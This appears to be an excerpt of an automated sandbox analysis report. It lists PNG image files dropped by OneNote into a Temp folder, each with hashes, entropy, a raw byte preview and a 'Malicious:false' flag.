                                                                                                                                                    Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{83203535-F5CE-4285-8307-77B5C31C5FA6}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4490
                                                                                                                                                    Entropy (8bit):7.928016176674318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                    MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                    SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                    SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                    SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{83F21CF8-471C-4F66-8664-7CC73738CFBC}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7374
                                                                                                                                                    Entropy (8bit):7.955141875077912
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                    MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                    SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                    SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                    SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{86650956-1396-486F-85F5-3A56329C9716}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2210
                                                                                                                                                    Entropy (8bit):7.86853667196985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                    MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                    SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                    SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                    SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{871E0D58-08D4-4339-8C20-658D87460E97}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11332
                                                                                                                                                    Entropy (8bit):7.9324721568775285
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                    MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                    SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                    SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                    SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{8967BA46-B370-451A-8CEF-1613067796B5}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5386
                                                                                                                                                    Entropy (8bit):7.943706538857394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                    MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                    SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                    SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                    SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{89F2A1AB-B17B-4719-B59F-45F55C0ED4F7}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{8D8EC411-99E8-48E6-ADBA-594667D62ABA}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22634
                                                                                                                                                    Entropy (8bit):7.974332204835705
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                    MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                    SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                    SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                    SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{8E0E3D61-6878-4E2E-A443-7B33EB366DD0}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14458
                                                                                                                                                    Entropy (8bit):7.944094738048628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                    MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                    SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                    SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                    SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{924AF9BE-1999-4E54-8BE9-050A0421CAF3}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13084
                                                                                                                                                    Entropy (8bit):7.940058639272698
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                    MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                    SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                    SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                    SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{93885A54-8B09-4F11-8175-6110ECBC26B4}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17289
                                                                                                                                                    Entropy (8bit):7.962998633267186
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                    MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                    SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                    SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                    SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9631D0C7-D35A-4006-80B8-4A6E31C535B2}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11332
                                                                                                                                                    Entropy (8bit):7.9324721568775285
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                    MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                    SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                    SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                    SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{96CB5ADE-2EC4-4B57-92B3-A1B95C828887}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4847
                                                                                                                                                    Entropy (8bit):7.950192613458318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                    MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                    SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                    SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                    SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                    Malicious:false
